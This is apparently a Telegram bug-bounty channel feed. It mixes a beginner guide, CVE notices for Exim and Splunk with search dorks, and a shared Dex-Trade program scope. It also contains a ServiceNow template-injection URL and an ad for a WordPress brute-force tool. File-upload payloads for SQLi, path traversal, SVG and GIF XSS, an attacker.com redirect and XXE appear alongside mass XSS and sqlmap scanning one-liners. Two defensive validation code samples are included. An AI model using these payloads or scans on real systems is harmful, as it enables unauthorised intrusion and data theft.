Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Shodan_for_Pentesting_1718863899.pdf (13.13 MB)

Chaining Three Bugs to Access All Your ServiceNow Data Critical exploit chain affecting 40k+ instances of ServiceNow, leading to unauthenticated arbitrary code execution and data access. Template Injection: http://1337/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>

✅️ REDZ0N3 Private WP Bruteforce XML-RPC [8 Macros] For Sell . Best WP BruteForce Tools In Market DM :- @Its_R00T

How To Become A Top Bug Bounty Hunter In 2024

▪️Choose a Platform:
👉 HackerOne or Bugcrowd are excellent platforms to begin your journey.
👉 Create an account and explore the available programs.

▪️Understand the Programs:
(i) Each program will have specific guidelines on what types of vulnerabilities they are looking for.
(ii) Review the scope of the program to understand what is in and out of bounds.

▪️Learn and Practice:
👉 OWASP (Open Web Application Security Project) offers free resources and guides on web security.
👉 PortSwigger Web Security Academy provides interactive labs and tutorials to practice finding vulnerabilities.
👉 Google Gruyere is a beginner-friendly resource for practicing web vulnerabilities.
👉 Hack The Box and TryHackMe are platforms where you can practice your skills in realistic environments.

✖️Learn to Use Tools:
👉 Familiarize yourself with tools like Burp Suite, Nmap, Wireshark, and Metasploit. These tools are essential for testing and identifying vulnerabilities.
👉 Burp Suite Documentation and Kali Linux Tools Documentation are great places to start.

▪️Develop Your Skills:
👉 Stay updated with the latest vulnerabilities and exploits by following websites like Exploit-DB and SecurityFocus.
👉 Join communities and forums such as Reddit’s Netsec, Stack Overflow, and Bugcrowd Forum to interact with other bug hunters and share knowledge.

✖️Report Bugs:
(i) Once you discover a vulnerability, document it clearly and report it through the platform you are using.
(ii) Follow the platform’s submission guidelines to ensure your report is complete and understandable.

⚜Get Paid:
👉 After your report is verified by the platform or the company, you will receive a payout. The amount can vary greatly depending on the severity and uniqueness of the vulnerability.

♦️Why Pursue Bug Bounty Hunting?
📍High Earnings: Successful bug hunters can earn thousands of dollars per bug. The payouts depend on the criticality of the vulnerabilities found.
📍Skill Development: You’ll gain hands-on experience and improve your cybersecurity skills.
📍Flexibility: Work at your own pace and choose the projects that interest you.

🏷 Additional Resources:
HackerOne Directory
Bugcrowd University
Web Application Security Resources
PentesterLab
The Hacker Playbook

https://t.me/boost/bugbounty_tech Please help my channel reach the next level. Thanks in advance.

CVE-2024-39929: Bypass of attachment verification in Exim❗ Due to incorrect parsing of a multiline RFC 2231 header filename, an attacker can bypass attachment verification and send an executable payload to the victim. Search at Netlas.io: 👉 Link: https://nt.ls/gRdtH 👉 Dork: smtp.banner:"Exim" NOT smtp.banner:"Exim 4.98" Read more: https://bugs.exim.org/show_bug.cgi?id=3099#c4
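
A general illustration of why an attachment filter has to reassemble RFC 2231 continuations (`filename*0`, `filename*1`, ...) before it checks the extension. This is an added example, not Exim's code; the deny-list, the sample headers and the function names are constructed for the illustration.

```python
import re
from email import message_from_string

# Assumption: a sample extension deny-list, not taken from any real product.
BLOCKED_EXT = (".exe", ".scr", ".js", ".bat")

# Constructed sample: one filename split across two RFC 2231 continuations.
SAMPLE_HEADERS = (
    "Content-Type: application/octet-stream\n"
    "Content-Disposition: attachment;\n"
    ' filename*0="report.pdf";\n'
    ' filename*1=".exe"\n'
    "\n"
)

def naive_filename(headers):
    """Flawed check: reads the first filename parameter and ignores the rest."""
    m = re.search(r'filename\*?\d*\*?="?([^";\r\n]+)', headers, re.I)
    return m.group(1) if m else None

def rfc2231_filename(headers):
    """Lets the stdlib parser join every continuation, in order, into one name."""
    return message_from_string(headers).get_filename()

def is_blocked(filename):
    """Extension check on the complete name, ignoring trailing dots and spaces."""
    if filename is None:
        return False
    return filename.lower().rstrip(". ").endswith(BLOCKED_EXT)

if __name__ == "__main__":
    for parse in (naive_filename, rfc2231_filename):
        name = parse(SAMPLE_HEADERS)
        print(f"{parse.__name__}: {name!r} blocked={is_blocked(name)}")
```

The same sample headers are a useful regression test for any mail filter rule that matches on attachment names.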

What's the update, guys, on the BugBounty program? Is anyone hunting on that?

⚠️CVE-2024-36991: Path Traversal on the “/modules/messaging/“ endpoint in Splunk Enterprise on Windows. 📣Sign Up On Netlas.io: https://app.netlas.io/ref/9cc61538/ 📣Join Official Netlas Telegram: https://t.me/netlas 🔴In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. ✅PoC: https://github.com/bigb0x/CVE-2024-36991 ℹ️Netlas Dork: http.body:"splunk-Enterprise"

900 guys ❤️❤️😍😍 let's make it 1k

🔰 Chaining Vulnerabilities through File Upload!
SQLi⏳
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal⏳
../../etc/passwd/logo.png
../../../logo.png
XSS⏳
->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

->  Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>
Open redirect ⏳
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE ⏳
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
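
The server-side checks that stop the filenames and file bodies listed in the post above, as an added example that is not part of the original post. It assumes the application only needs raster images (so SVG is refused outright); the function names and the allow-list are constructed for the illustration.

```python
import os
import re
import secrets

ALLOWED = {  # assumption: extension -> magic bytes for the raster types accepted
    ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8",
}
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.[A-Za-z0-9]{1,5}")
MARKUP = re.compile(rb"<\s*(?:\?xml|!DOCTYPE|!ENTITY|svg|script)", re.I)

def validate_upload(name, data):
    """Return the reasons an upload is refused (empty list means accepted)."""
    reasons = []
    if "/" in name or "\\" in name or ".." in name:
        reasons.append("path component in filename")
    if not SAFE_NAME.fullmatch(name):
        reasons.append("filename outside allow-list")
    magic = ALLOWED.get(os.path.splitext(name)[1].lower())
    if magic is None:
        reasons.append("extension not allowed")
    elif not data.startswith(magic):
        reasons.append("content does not match extension")
    if MARKUP.search(data):  # catches "GIF89a/<svg ..." style polyglots
        reasons.append("markup inside image data")
    return reasons

def stored_name(name):
    """Server-generated name, so the client's name never reaches disk, SQL or HTML."""
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + ext

if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # constructed minimal header
    for n, d in [("logo.png", png), ("../../../logo.png", png),
                 ("a.gif", b"GIF89a/<svg/onload=alert(1)>/")]:
        print(n, validate_upload(n, d))
```

Re-encoding accepted images and serving them with a fixed image content type are the stronger controls; these checks are the first gate in front of them.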

🚨 XSS Hunting from WaybackURLS 🔍 Payload :
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
credit : gudetama_bf #bugbountytips #bugbounty

subfinder -dL subdomain.txt | grep -Eo 'https?://[^ ]+\?[a-zA-Z0-9_-]+=\d+['"'"'"]?' wayback_urls.txt > potential_sqli.txt && while read url; do sqlmap -u "$url" --batch --level 5 --risk 3 --all --random-agent --time-sec 10 ; done < potential_sqli.txt

Anyone?

If you guys hunt and find bugs, we will put up a hall of fame in this group and celebrate it. OK Hunters, MAKE SOME NOISE

Program Rules
- Avoid using web application scanners for automatic vulnerability searching which generates massive traffic
- Make every effort not to damage or restrict the availability of products, services, or infrastructure
- Avoid compromising any personal data, interruption, or degradation of any service
- Don’t access or modify other user data, localize all tests to your accounts
- Perform testing only within the scope
- Don’t exploit any DoS/DDoS vulnerabilities, social engineering attacks, or spam
- Don’t spam forms or account creation flows using automated scanners
- In case you find chain vulnerabilities we’ll pay only for vulnerability with the highest severity.
- Don’t break any law and stay in the defined scope

For more info: https://hackenproof.com/programs/dex-trade
Here are the program rules, and once you find the bug you can report via hackenproof or via emails.

Good morning, Hunters. As I said yesterday, I will be posting some bug-bounty programs in the channel so that you guys can start hunting. Here is the program for the 1st week, which I am also working on and which is also good for beginners.

DEX-trade

INFO
Dex-Trade is a young but the most technically equipped crypto exchange, it offers traders an easy-to-use interface and transactions safety. Since 2018, the Dex-Trade team maintains the largest range of security measures and security risk control measures in the industry

| Target | Type | Reward |
| --- | --- | --- |
| dex-trade.com | Web | bounty |
| api.dex-trade.com | API | bounty |
| *.dex-trade.com | Web | bounty |

Range of bounty: $50 - $3000

| Severity | Reward |
| --- | --- |
| Critical | $3000 |
| High | $1000 |
| Medium | $500 |
| Low | $200 |

## Focus Area

IN-SCOPE VULNERABILITIES (WEB, MOBILE)
- We are interested in the following vulnerabilities:
  - Business logic issues
  - Payments manipulation
  - Remote code execution (RCE)
  - Injection vulnerabilities (SQL, XXE)
  - File inclusions (Local & Remote)
  - Access Control Issues (IDOR, Privilege Escalation, etc)
  - Leakage of sensitive information
  - Server-Side Request Forgery (SSRF)
  - Cross-Site Request Forgery (CSRF)
  - Cross-Site Scripting (XSS)
  - Directory traversal
  - Other vulnerability with a clear potential loss

OUT OF SCOPE: WEB VULNERABILITIES
- Vulnerabilities found in out of scope resources are unlikely to be rewarded unless they present a serious business risk (at our sole discretion). In general, the following vulnerabilities do not correspond to the severity threshold:
- Vulnerabilities in third-party applications
- Assets that do not belong to the company
- Best practices concerns
- Recently (less than 30 days) disclosed 0day vulnerabilities
- Vulnerabilities affecting users of outdated browsers or platforms
- Social engineering, phishing, physical, or other fraud activities
- Publicly accessible login panels without proof of exploitation
- Reports that state that software is out of date/vulnerable without a proof of concept
- Reports that generated by scanners or any automated or active exploit tools
- Vulnerabilities involving active content such as web browser add-ons
- Most brute-forcing issues without clear impact
- Denial of service (DoS/DDoS)
- Theoretical issues
- Moderately Sensitive Information Disclosure
- Spam (sms, email, etc)
- Missing HTTP security headers
- Infrastructure vulnerabilities, including:
  - Certificates/TLS/SSL-related issues;
  - DNS issues (i.e. MX records, SPF records, DMARC records etc.);
  - Server configuration issues (i.e., open ports, TLS, etc.)
- Open redirects
- Session fixation
- User account enumeration
- Clickjacking/Tapjacking and issues only exploitable through clickjacking/tap jacking
- Descriptive error messages (e.g. Stack Traces, application or server errors)
- Self-XSS that cannot be used to exploit other users
- Login & Logout CSRF
- Weak Captcha/Captcha Bypass
- Lack of Secure and HTTPOnly cookie flags
- Username/email enumeration via Login/Forgot Password Page error messages
- CSRF in forms that are available to anonymous users (e.g. the contact form)
- OPTIONS/TRACE HTTP method enabled
- Host header issues without proof-of-concept demonstrating the vulnerability
- Content spoofing and text injection issues without showing an attack vector/without being able to modify HTML/CSS
- Content Spoofing without embedded links/HTML
- Reflected File Download (RFD)
- Mixed HTTP Content
- HTTPS Mixed Content Scripts
- Manipulation with Password Reset Token
- MitM and local attacks

OUT OF SCOPE: MOBILE VULNERABILITIES
- Attacks requiring physical access to a user's device
- Vulnerabilities that require root/jailbreak
- Vulnerabilities requiring extensive user interaction
- Exposure of non-sensitive data on the device
- Reports from static analysis of the binary without PoC that impacts business logic
- Lack of obfuscation/binary protection/root(jailbreak) detection
- Bypass certificate pinning on rooted devices
- Lack of Exploit mitigations

Okay, let's start this from tomorrow. But one request: if you find bugs and get bounties, don't forget to share it here.

Benefits of sharing programs
1. Less finding program work
2. Less competition
3. More reports and earning
4. Free collaboration and networking
5. No BugBounty fees.

Guys, should I share a BugBounty program with the details, so that you guys can start hunting from today?